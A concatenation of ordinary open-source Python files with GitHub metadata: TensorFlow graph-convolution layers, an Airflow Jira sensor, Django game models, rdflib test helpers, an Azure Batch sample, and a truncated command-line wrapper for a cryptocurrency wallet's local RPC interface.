X_splits = [X_df.filter(items=component) for component in components]
subgraphs = [G.subgraph(component) for component in components]
return X_splits, subgraphs
def _pool_step(
X,
pool_size, #TODO(mmd): Better name
pooler = tf.nn.max_pool,
):
"""Pooling of size p. Should be a power of 2 greater than 1."""
# TODO(mmd): Why all the expansion squeezing necessary?
x = tf.expand_dims(x, 3) # num_samples x num_features x num_filters_in x 1
x = pooler(x, ksize=[1,pool_size,1,1], strides=[1,pool_size,1,1], padding='SAME')
#tf.maximum
return tf.squeeze(x, [3]) # num_samples x num_features / p x num_filters
# TODO(mmd): Unify shape API for graph_conf layers.
# TODO(mmd): Better name.
def _full_fourier_graph_conv_step(
X,
G,
scope,
nodelist,
receptive_field_size = 10,
num_filters_out = 32,
activation = leaky_relu,
batch_normalization = None,
training = True,
weights_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.05),
bias_init = tf.constant_initializer(0.0),
):
"""Graph CNN with full weight matrices, i.e. patch has the same size as input."""
num_samples, num_features, num_filters_in = X.shape.as_list()
L = networkx.normalized_laplacian_matrix(G, nodelist=nodelist)
U = tf.constant(np.linalg.eigh(L.toarray())[1], dtype=tf.float32)
# TODO(mmd): Get the below to work.
#_, U = scipy.sparse.linalg.eigsh(L, k=k, which='SM')
x = tf.transpose(X, [0, 2, 1]) # num_samples x num_filters_in x num_features
x = tf.reshape(x, [num_samples * num_filters_in, num_features])
xf = tf.expand_dims(tf.matmul(x, U), 1)
xf = tf.reshape(xf, [num_samples, num_filters_in, num_features])
xf = tf.transpose(xf, [2, 1, 0]) # num_features x num_filters_in x num_samples
with tf.variable_scope(scope):
# TODO(mmd): Shapes probably wrong.
W = tf.get_variable(
'graph_convolution',
[num_features * num_filters_in, num_filters_out, 1],
tf.float32,
initializer = weights_init,
)
b = tf.get_variable(
'graph_bias',
[1, num_filters_out, 1],
tf.float32,
initializer = bias_init,
)
yf = tf.matmul(W, xf)
yf = tf.reshape(tf.transpose(yf, [2, 1, 0]), [num_samples * num_filters_out, num_features])
y = tf.matmul(yf, tf.transpose(U))
return activation(tf.reshape(y, [num_samples, num_filters_out, num_features]) + b)
# Chebyshev
def _chebyshev_graph_conv_step(
X,
G,
scope,
nodelist,
receptive_field_size = 10,
num_filters_out = 32,
activation = leaky_relu,
batch_normalization = None,
training = True,
weights_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.05),
bias_init = tf.constant_initializer(0.0),
):
"""Graph CNN with full weights, i.e. patch has the same size as input."""
num_samples, num_features, num_filters_in = X.shape.as_list()
L = networkx.normalized_laplacian_matrix(G, nodelist=nodelist).astype(np.float32)
L = (L - scipy.sparse.identity(num_features, dtype=L.dtype, format='csr')).tocoo()
indices = np.column_stack((L.row, L.col))
L = tf.sparse_reorder(tf.SparseTensor(indices=indices, values=L.data, dense_shape=L.shape))
# Transform to Chebyshev basis
# TODO(mmd): Are the permutations/reshapes really necessary or would this just work with smart
# broadcasting?
x0 = tf.transpose(X, perm=[1, 2, 0]) # num_features x num_filters_in x num_samples
x0 = tf.reshape(x0, [num_features, num_filters_in*num_samples])
chebyshev_terms = [x0]
if receptive_field_size > 1:
chebyshev_terms.append(tf.sparse_tensor_dense_matmul(L, chebyshev_terms[-1]))
for _ in range(2, receptive_field_size):
chebyshev_terms += [2*tf.sparse_tensor_dense_matmul(L, chebyshev_terms[-1]) - chebyshev_terms[-2]]
x = tf.stack(chebyshev_terms) # receptive_field_size x num_features x num_filters_in*num_samples
x = tf.reshape(x, [receptive_field_size, num_features, num_filters_in, num_samples])
x = tf.transpose(x, perm=[3,1,2,0]) # num_samples x num_features x num_filters_in x receptive_field_size
# TODO(mmd): Do I need to reshape like this or can this be handled fine with tensor multiplications?
x = tf.reshape(x, [num_samples * num_features, num_filters_in * receptive_field_size])
with tf.variable_scope(scope):
# Filter: num_filters_in -> num_filters_out filters of order K, i.e. one filterbank per feature pair.
W = tf.get_variable(
'graph_convolution',
[num_filters_in * receptive_field_size, num_filters_out],
tf.float32,
initializer = weights_init
)
b = tf.get_variable(
'bias',
[1, 1, num_filters_out],
tf.float32,
initializer = bias_init
)
x = activation(tf.matmul(x, W) + b)
return tf.reshape(x, [num_samples, num_features, num_filters_out])
# TODO(mmd): Make accept num_filters_out (right now is effectively (though not in impl.) hard-coded @ 1)
def _graph_localized_ff_step(
X,
G,
scope,
nodelist,
activation = leaky_relu,
batch_normalization = None,
training = True,
weights_init = tf.truncated_normal_initializer(mean=0.0, stddev=0.05),
bias_init = tf.constant_initializer(0.0),
):
num_samples, num_features = X.shape.as_list()
A = networkx.adjacency_matrix(G, nodelist=nodelist).astype(np.float32)
A = (A + scipy.sparse.identity(num_features, dtype=A.dtype, format='csr')).tocoo()
indices = np.column_stack((A.row, A.col))
num_edges = len(indices)
with tf.variable_scope(scope):
W = tf.get_variable(
'graph_localized_ff_weights',
[num_edges],
tf.float32,
initializer = weights_init,
)
W_tensor = tf.sparse_reorder(
tf.SparseTensor(indices=indices, values=W, dense_shape=[num_features, num_features])
)
b = tf.get_variable(
'bias',
[num_features],
tf.float32,
initializer = bias_init,
)
return activation(tf.transpose(tf.sparse_tensor_dense_matmul(W_tensor, tf.transpose(X))) + b)
| {
"content_hash": "e91ac38d1cb7f90f36f7fee4fa956d30",
"timestamp": "",
"source": "github",
"line_count": 172,
"max_line_length": 110,
"avg_line_length": 39.401162790697676,
"alnum_prop": 0.6175298804780877,
"repo_name": "mmcdermott/ml_toolkit",
"id": "8626e98cb92b8bc7d9556d24dbc5111ff058558b",
"size": "6827",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ml_toolkit/graph_layers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34746"
}
],
"symlink_target": ""
} |
"""Generates a saved model with tf.Pow to trigger placer and grappler."""
import shutil
from absl import app
from absl import flags
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.saved_model import builder
from tensorflow.python.saved_model import signature_constants
from tensorflow.python.saved_model import signature_def_utils
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.saved_model import utils
flags.DEFINE_string('saved_model_path', '', 'Path to save the model to.')
FLAGS = flags.FLAGS
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
shutil.rmtree(FLAGS.saved_model_path)
# Create the graph
# 'x' is a read-only Reference Variable in this test case, which will be
# converted to Resource Variable in the MLIR lowering pass.
x = variable_scope.get_variable(name='x', initializer=[[1], [2], [3]])
r = math_ops.add(x, 1)
x1 = array_ops.placeholder(dtype=dtypes.int32, shape=(1, 3), name='input1')
r1 = math_ops.add(x1, 1)
sess = session.Session()
sess.run(variables.global_variables_initializer())
sm_builder = builder.SavedModelBuilder(FLAGS.saved_model_path)
tensor_info_x = utils.build_tensor_info(x)
tensor_info_r = utils.build_tensor_info(r)
tensor_info_x1 = utils.build_tensor_info(x1)
tensor_info_r1 = utils.build_tensor_info(r1)
ref_signature = (
signature_def_utils.build_signature_def(
inputs={'x': tensor_info_x},
outputs={'r': tensor_info_r},
method_name=signature_constants.PREDICT_METHOD_NAME))
non_ref_signature = (
signature_def_utils.build_signature_def(
inputs={'x1': tensor_info_x1},
outputs={'r1': tensor_info_r1},
method_name=signature_constants.PREDICT_METHOD_NAME))
sm_builder.add_meta_graph_and_variables(
sess, [tag_constants.SERVING],
signature_def_map={
'ref': ref_signature,
'non_ref': non_ref_signature,
},
strip_default_attrs=True)
sm_builder.save()
if __name__ == '__main__':
app.run(main)
| {
"content_hash": "2a6034a4478469f795706bf32defe2a7",
"timestamp": "",
"source": "github",
"line_count": 72,
"max_line_length": 77,
"avg_line_length": 32.361111111111114,
"alnum_prop": 0.7072961373390558,
"repo_name": "tensorflow/tensorflow-pywrap_tf_optimizer",
"id": "8825353cba9539db0b62d3a8961dc25fe47f1a98",
"size": "3019",
"binary": false,
"copies": "11",
"ref": "refs/heads/master",
"path": "tensorflow/core/tfrt/saved_model/tests/gen_ref_type_tensor_input.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "36962"
},
{
"name": "C",
"bytes": "1360509"
},
{
"name": "C#",
"bytes": "13584"
},
{
"name": "C++",
"bytes": "124617937"
},
{
"name": "CMake",
"bytes": "183407"
},
{
"name": "Cython",
"bytes": "5003"
},
{
"name": "Dockerfile",
"bytes": "416070"
},
{
"name": "Go",
"bytes": "2104698"
},
{
"name": "HTML",
"bytes": "4686483"
},
{
"name": "Java",
"bytes": "1074471"
},
{
"name": "Jupyter Notebook",
"bytes": "789401"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "MLIR",
"bytes": "11175525"
},
{
"name": "Makefile",
"bytes": "2760"
},
{
"name": "Objective-C",
"bytes": "169288"
},
{
"name": "Objective-C++",
"bytes": "294187"
},
{
"name": "Pawn",
"bytes": "5552"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "Python",
"bytes": "42599764"
},
{
"name": "Roff",
"bytes": "5034"
},
{
"name": "Ruby",
"bytes": "9199"
},
{
"name": "Shell",
"bytes": "619753"
},
{
"name": "Smarty",
"bytes": "89545"
},
{
"name": "SourcePawn",
"bytes": "14607"
},
{
"name": "Starlark",
"bytes": "7521293"
},
{
"name": "Swift",
"bytes": "78435"
},
{
"name": "Vim Snippet",
"bytes": "58"
}
],
"symlink_target": ""
} |
import numpy as np
from .interfaces.dataset import Dataset
from .interfaces.model import Model
from .interfaces.loss import Loss
from .interfaces.optimizer import Optimizer
from .interfaces.batch_scheduler import BatchScheduler
class DummyDataset(Dataset):
def __init__(self):
super(DummyDataset, self).__init__(np.array([]))
class DummyModel(Model):
def __init__(self):
super(DummyModel, self).__init__()
self._parameters = []
@property
def parameters(self):
return self._parameters
@property
def updates(self):
return {}
def get_output(self, inputs):
return inputs
def save(self, path):
pass
def load(self, path):
pass
class DummyLoss(Loss):
def __init__(self):
super(DummyLoss, self).__init__(DummyModel(), DummyDataset())
def _compute_loss(self, model_output):
return model_output
def _get_updates(self):
return {}
class DummyOptimizer(Optimizer):
def __init__(self):
super(DummyOptimizer, self).__init__(loss=DummyLoss())
def _get_updates(self):
return {}
def _get_directions(self):
return {}
class DummyBatchScheduler(BatchScheduler):
def __init__(self):
super(DummyBatchScheduler, self).__init__(DummyDataset())
@property
def givens(self):
return {}
@property
def updates(self):
return {}
def __iter__(self):
return iter(range(1))
| {
"content_hash": "75a0d3272a35eff2197ec677ed9c6238",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 69,
"avg_line_length": 20.397260273972602,
"alnum_prop": 0.6165211551376762,
"repo_name": "havaeimo/smartlearner",
"id": "5edf1cec1875d5e1a1ea63c6f653830b0c541a67",
"size": "1489",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smartlearner/testing.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "53080"
}
],
"symlink_target": ""
} |
from typing import Any, Callable, Dict, Optional
from jira.resources import Issue, Resource
from airflow.providers.jira.operators.jira import JIRAError, JiraOperator
from airflow.sensors.base import BaseSensorOperator
class JiraSensor(BaseSensorOperator):
"""
Monitors a jira ticket for any change.
:param jira_conn_id: reference to a pre-defined Jira Connection
:type jira_conn_id: str
:param method_name: method name from jira-python-sdk to be execute
:type method_name: str
:param method_params: parameters for the method method_name
:type method_params: dict
:param result_processor: function that return boolean and act as a sensor response
:type result_processor: function
"""
def __init__(
self,
*,
method_name: str,
jira_conn_id: str = 'jira_default',
method_params: Optional[dict] = None,
result_processor: Optional[Callable] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.jira_conn_id = jira_conn_id
self.result_processor = None
if result_processor is not None:
self.result_processor = result_processor
self.method_name = method_name
self.method_params = method_params
self.jira_operator = JiraOperator(
task_id=self.task_id,
jira_conn_id=self.jira_conn_id,
jira_method=self.method_name,
jira_method_args=self.method_params,
result_processor=self.result_processor,
)
def poke(self, context: Dict) -> Any:
return self.jira_operator.execute(context=context)
class JiraTicketSensor(JiraSensor):
"""
Monitors a jira ticket for given change in terms of function.
:param jira_conn_id: reference to a pre-defined Jira Connection
:type jira_conn_id: str
:param ticket_id: id of the ticket to be monitored
:type ticket_id: str
:param field: field of the ticket to be monitored
:type field: str
:param expected_value: expected value of the field
:type expected_value: str
:param result_processor: function that return boolean and act as a sensor response
:type result_processor: function
"""
template_fields = ("ticket_id",)
def __init__(
self,
*,
jira_conn_id: str = 'jira_default',
ticket_id: Optional[str] = None,
field: Optional[str] = None,
expected_value: Optional[str] = None,
field_checker_func: Optional[Callable] = None,
**kwargs,
) -> None:
self.jira_conn_id = jira_conn_id
self.ticket_id = ticket_id
self.field = field
self.expected_value = expected_value
if field_checker_func is None:
field_checker_func = self.issue_field_checker
super().__init__(jira_conn_id=jira_conn_id, result_processor=field_checker_func, **kwargs)
def poke(self, context: Dict) -> Any:
self.log.info('Jira Sensor checking for change in ticket: %s', self.ticket_id)
self.jira_operator.method_name = "issue"
self.jira_operator.jira_method_args = {'id': self.ticket_id, 'fields': self.field}
return JiraSensor.poke(self, context=context)
def issue_field_checker(self, issue: Issue) -> Optional[bool]:
"""Check issue using different conditions to prepare to evaluate sensor."""
result = None
try:
if issue is not None and self.field is not None and self.expected_value is not None:
field_val = getattr(issue.fields, self.field)
if field_val is not None:
if isinstance(field_val, list):
result = self.expected_value in field_val
elif isinstance(field_val, str):
result = self.expected_value.lower() == field_val.lower()
elif isinstance(field_val, Resource) and getattr(field_val, 'name'):
result = self.expected_value.lower() == field_val.name.lower()
else:
self.log.warning(
"Not implemented checker for issue field %s which "
"is neither string nor list nor Jira Resource",
self.field,
)
except JIRAError as jira_error:
self.log.error("Jira error while checking with expected value: %s", jira_error)
except Exception:
self.log.exception("Error while checking with expected value %s:", self.expected_value)
if result is True:
self.log.info(
"Issue field %s has expected value %s, returning success", self.field, self.expected_value
)
else:
self.log.info("Issue field %s don't have expected value %s yet.", self.field, self.expected_value)
return result
| {
"content_hash": "32d1e935ec2aaeebc16a65c7a12c8dd8",
"timestamp": "",
"source": "github",
"line_count": 127,
"max_line_length": 110,
"avg_line_length": 38.75590551181102,
"alnum_prop": 0.6091019910605445,
"repo_name": "dhuang/incubator-airflow",
"id": "30e272758bfa04f9a0a44f63bcdb46a1482667bc",
"size": "5709",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "airflow/providers/jira/sensors/jira.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "109698"
},
{
"name": "HTML",
"bytes": "264851"
},
{
"name": "JavaScript",
"bytes": "1988427"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "3357958"
},
{
"name": "Shell",
"bytes": "34442"
}
],
"symlink_target": ""
} |
from django.db import models
from django.utils import timezone
from django.core.urlresolvers import reverse
class CodeMixin(models.Model):
code = models.CharField(max_length=255, unique=True)
class Meta:
abstract = True
class NameMixin(models.Model):
name = models.CharField(max_length=255, unique=True)
class Meta:
abstract = True
ordering = ('name',)
def __str__(self):
return self.name
class AbstractSet(models.Model):
max_choices = models.IntegerField(default=1)
class Meta:
abstract = True
def __str__(self):
return '/'.join([choice.name for choice in self.choices.all()])
class DescriptionMixin(models.Model):
description = models.TextField(null=True, blank=True)
class Meta:
abstract = True
class Character(NameMixin):
background = models.TextField(null=True, blank=True)
creation_date = models.DateTimeField(default=timezone.now)
class Talent(CodeMixin, NameMixin, DescriptionMixin):
linked_talent = models.ForeignKey('self', null=True, blank=True)
def get_absolute_url(self):
return reverse('talents:index') + '#{0}'.format(self.code)
class TalentSet(AbstractSet):
choices = models.ManyToManyField(Talent, related_name='talentsets')
class Skill(CodeMixin, NameMixin, DescriptionMixin):
ATTRIBUTE_CHOICES = (
('strength', 'Strength'),
('constitution', 'Constitution'),
('agility', 'Agility'),
('intelligence', 'Intelligence'),
('mental_strength', 'Mental strength'),
('sociability', 'Sociability'),
)
TYPE_CHOICES = (
('base', 'Base'),
('advanced', 'Advanced'),
)
attribute = models.CharField(choices=ATTRIBUTE_CHOICES, max_length=30, blank=True, null=True)
type = models.CharField(choices=TYPE_CHOICES, max_length=30, default='base')
linked_talents = models.ManyToManyField(Talent, blank=True, related_name='linked_skills')
linked_skill = models.ForeignKey('self', null=True, blank=True)
def get_absolute_url(self):
return reverse('skills:index') + '#{0}'.format(self.code)
class SkillSet(AbstractSet):
choices = models.ManyToManyField(Skill, related_name='skillsets')
class Career(CodeMixin, NameMixin, DescriptionMixin):
exits = models.ManyToManyField('self', blank=True, symmetrical=False, related_name='access')
talents = models.ManyToManyField(TalentSet, blank=True)
skills = models.ManyToManyField(SkillSet, blank=True)
# main profile
cc = models.IntegerField(default=0)
ct = models.IntegerField(default=0)
strength = models.IntegerField(default=0)
constitution = models.IntegerField(default=0)
agility = models.IntegerField(default=0)
intelligence = models.IntegerField(default=0)
mental_strength = models.IntegerField(default=0)
sociability = models.IntegerField(default=0)
# secondary profile
attacks = models.IntegerField(default=0)
wounds = models.IntegerField(default=0)
movement = models.IntegerField(default=0)
magic = models.IntegerField(default=0)
def get_absolute_url(self):
return reverse('careers:index') + '#{0}'.format(self.code)
| {
"content_hash": "3f5ea7487682feb0211d375c1bb3e4f7",
"timestamp": "",
"source": "github",
"line_count": 102,
"max_line_length": 97,
"avg_line_length": 31.41176470588235,
"alnum_prop": 0.6869538077403246,
"repo_name": "EliotBerriot/malepierre",
"id": "e2014d5359501b972b70c4ffcf2d05d8c9ea9fb3",
"size": "3228",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "malepierre/characters/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1212"
},
{
"name": "HTML",
"bytes": "27878"
},
{
"name": "JavaScript",
"bytes": "2394"
},
{
"name": "Nginx",
"bytes": "1095"
},
{
"name": "Python",
"bytes": "164935"
},
{
"name": "Shell",
"bytes": "4479"
}
],
"symlink_target": ""
} |
import sys
import isodate
import datetime
from traceback import print_exc
from nose import SkipTest
from earl import add_test, report
from rdflib import BNode, Graph, ConjunctiveGraph
# TODO: make an introspective version (like this one) of
# rdflib.graphutils.isomorphic and use instead.
def crapCompare(g1, g2):
"""A really crappy way to 'check' if two graphs are equal. It ignores blank
nodes completely and ignores subgraphs."""
if len(g1) != len(g2):
raise Exception("Graphs dont have same length")
for t in g1:
s = _no_blank(t[0])
o = _no_blank(t[2])
if not (s, t[1] ,o) in g2:
e = "(%s, %s, %s) is not in both graphs!"%(s, t[1], o)
raise Exception, e
def _no_blank(node):
if isinstance(node, BNode): return None
if isinstance(node, Graph):
return None #node._Graph__identifier = _SQUASHED_NODE
return node
def check_serialize_parse(fpath, infmt, testfmt, verbose=False):
g = ConjunctiveGraph()
_parse_or_report(verbose, g, fpath, format=infmt)
if verbose:
for t in g:
print t
print "========================================"
print "Parsed OK!"
s = g.serialize(format=testfmt)
if verbose:
print s
g2 = ConjunctiveGraph()
_parse_or_report(verbose, g2, data=s, format=testfmt)
if verbose:
print g2.serialize()
crapCompare(g,g2)
def _parse_or_report(verbose, graph, *args, **kwargs):
try:
graph.parse(*args, **kwargs)
except:
if verbose:
print "========================================"
print "Error in parsing serialization:"
print args, kwargs
raise
def nose_tst_earl_report(generator, earl_report_name=None):
from optparse import OptionParser
p = OptionParser()
(options, args) = p.parse_args()
skip = 0
tests = 0
success = 0
for t in generator(args):
tests += 1
print 'Running ', t[1].uri
try:
t[0](t[1])
add_test(t[1].uri, "passed")
success += 1
except SkipTest, e:
add_test(t[1].uri, "untested", e.message)
print "skipping %s - %s" % (t[1].uri, e.message)
skip += 1
except KeyboardInterrupt:
raise
except AssertionError:
add_test(t[1].uri, "failed")
except:
add_test(t[1].uri, "failed", "error")
print_exc()
sys.stderr.write("%s\n" % t[1].uri)
print "Ran %d tests, %d skipped, %d failed. "%(tests, skip, tests-skip-success)
if earl_report_name:
now = isodate.datetime_isoformat(datetime.datetime.utcnow())
earl_report = 'test_reports/%s-%s.ttl' % (earl_report_name, now)
report.serialize(earl_report, format='n3')
report.serialize('test_reports/%s-latest.ttl'%earl_report_name, format='n3')
print "Wrote EARL-report to '%s'" % earl_report
| {
"content_hash": "9aa63c5f34734033307b40b4f0648c77",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 84,
"avg_line_length": 30.65979381443299,
"alnum_prop": 0.5706119704102219,
"repo_name": "dbs/rdflib",
"id": "6f97ea9d1ac8e90a27fc06fd87bfd29e4f69b0a5",
"size": "2975",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "test/testutils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "145"
},
{
"name": "HTML",
"bytes": "120202"
},
{
"name": "Jupyter Notebook",
"bytes": "283784"
},
{
"name": "Python",
"bytes": "1470218"
},
{
"name": "Ruby",
"bytes": "28544"
},
{
"name": "Shell",
"bytes": "1052"
}
],
"symlink_target": ""
} |
"""Common File System Utilities."""
import os
import shutil
def abspath(path):
"""
Return an absolute path, while also expanding the '~' user directory
shortcut.
:param path: The original path to expand.
:rtype: str
"""
return os.path.abspath(os.path.expanduser(path))
def backup(path, suffix='.bak'):
"""
Rename a file or directory safely without overwriting an existing
backup of the same name.
:param path: The path to the file or directory to make a backup of.
:param suffix: The suffix to rename files with.
:returns: The new path of backed up file/directory
:rtype: str
"""
count = -1
new_path = None
while True:
if os.path.exists(path):
if count == -1:
new_path = "%s%s" % (path, suffix)
else:
new_path = "%s%s.%s" % (path, suffix, count)
if os.path.exists(new_path):
count += 1
continue
else:
if os.path.isfile(path):
shutil.copy(path, new_path)
elif os.path.isdir(path):
shutil.copytree(path, new_path)
break
else:
break
return new_path
# Kinda dirty, but should resolve issues on Windows per #183
if 'HOME' in os.environ:
HOME_DIR = abspath(os.environ['HOME'])
else:
HOME_DIR = abspath('~') # pragma: nocover
| {
"content_hash": "d75999d2797ce37bfd1c5968551962fa",
"timestamp": "",
"source": "github",
"line_count": 55,
"max_line_length": 72,
"avg_line_length": 26.21818181818182,
"alnum_prop": 0.5575589459084604,
"repo_name": "akhilman/cement",
"id": "a96a52a01b987d41f6dfcbb74e4623b3578263e5",
"size": "1442",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cement/utils/fs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "186"
},
{
"name": "Makefile",
"bytes": "317"
},
{
"name": "PowerShell",
"bytes": "2184"
},
{
"name": "Python",
"bytes": "512585"
},
{
"name": "Shell",
"bytes": "1964"
}
],
"symlink_target": ""
} |
from .. ndtypes import make_fn_type, Type
from expr import Expr
from stmt import block_to_str
################################################################################
#
# Constructs below here are only used in the typed representation
#
################################################################################
class TransformHistory(object):
"""
Sequence of transforms which have been applied to a function,
used for caching to avoid repeating a transformation
"""
def __init__(self, transforms = None):
self.transforms = () if transforms is None else transforms
self.transform_set = frozenset(self.transforms)
self._hash = hash(self.transform_set)
def __contains__(self, T):
return T in self.transform_set
def add(self, T):
self.transforms = self.transforms + (T,)
self.transform_set = self.transform_set.union(frozenset([T]))
self._hash = hash(self.transform_set)
@property
def cache_key(self):
return self.transform_set
def __hash__(self):
return self._hash
def __eq__(self, other):
return self.transform_set == other.transform_set
def __ne__(self, other):
return self.transform_set != other.transform_set
def __str__(self):
return "TransformHistory(%s)" % str(self.transforms)
def __repr__(self):
return str(self)
def copy(self):
return TransformHistory()
class TypedFn(Expr):
"""
The body of a TypedFn should contain Expr nodes which have been extended with
a 'type' attribute
"""
def __init__(self, name, arg_names, body,
input_types, return_type,
type_env,
created_by = None,
transform_history = None,
source_info = None):
assert isinstance(name, str), "Invalid typed function name: %s" % (name,)
self.name = name
assert isinstance(arg_names, (list, tuple)), "Invalid typed function arguments: %s" % (arg_names,)
self.arg_names = arg_names
assert isinstance(input_types, (list, tuple)), "Invalid input types: %s" % (input_types,)
self.input_types = tuple(input_types)
assert isinstance(return_type, Type), "Invalid return type: %s" % (return_type,)
self.return_type = return_type
assert isinstance(body, list), "Invalid body for typed function: %s" % (body,)
self.body = body
assert isinstance(type_env, dict), "Invalid type environment: %s" % (type_env,)
self.type_env = type_env
self.type = make_fn_type(self.input_types, self.return_type)
self.created_by = created_by
if transform_history is None:
transform_history = TransformHistory()
self.transform_history = transform_history
self.source_info = source_info
@property
def cache_key(self):
return self.name, self.created_by, self.transform_history
@property
def version(self):
return self.transform_history.cache_key
def __repr__(self):
arg_strings = []
for name in self.arg_names:
arg_strings.append("%s : %s" % (name, self.type_env.get(name)))
return "function %s(%s) => %s:%s" % \
(self.name, ", ".join(arg_strings),
self.return_type,
block_to_str(self.body))
def __str__(self):
return repr(self)
# return "TypedFn(%s : %s => %s)" % (self.name, self.input_types, self.return_type)
def __hash__(self):
return hash(self.name) + hash(self.created_by)
def children(self):
return ()
| {
"content_hash": "830fe03da02a5cb20c8954fdd02dd612",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 102,
"avg_line_length": 28.427419354838708,
"alnum_prop": 0.5960283687943262,
"repo_name": "pombredanne/parakeet",
"id": "44a7a0a3e32b7f0d084b93ba023e608b5ae22207",
"size": "3526",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "parakeet/syntax/typed_fn.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "1008397"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.batch import BatchManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-batch
# USAGE
python location_get_quotas.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = BatchManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.location.get_quotas(
location_name="japaneast",
)
print(response)
# x-ms-original-file: specification/batch/resource-manager/Microsoft.Batch/stable/2022-10-01/examples/LocationGetQuotas.json
if __name__ == "__main__":
main()
| {
"content_hash": "adff4e05eca676663c601c957d91970a",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 124,
"avg_line_length": 31.1875,
"alnum_prop": 0.7284569138276553,
"repo_name": "Azure/azure-sdk-for-python",
"id": "25a2cd47e5be6b2ddc50522d17605ee572b11b82",
"size": "1466",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/batch/azure-mgmt-batch/generated_samples/location_get_quotas.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from jsonrpc import ServiceProxy
import sys
import string
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:9332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a Dcoin address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
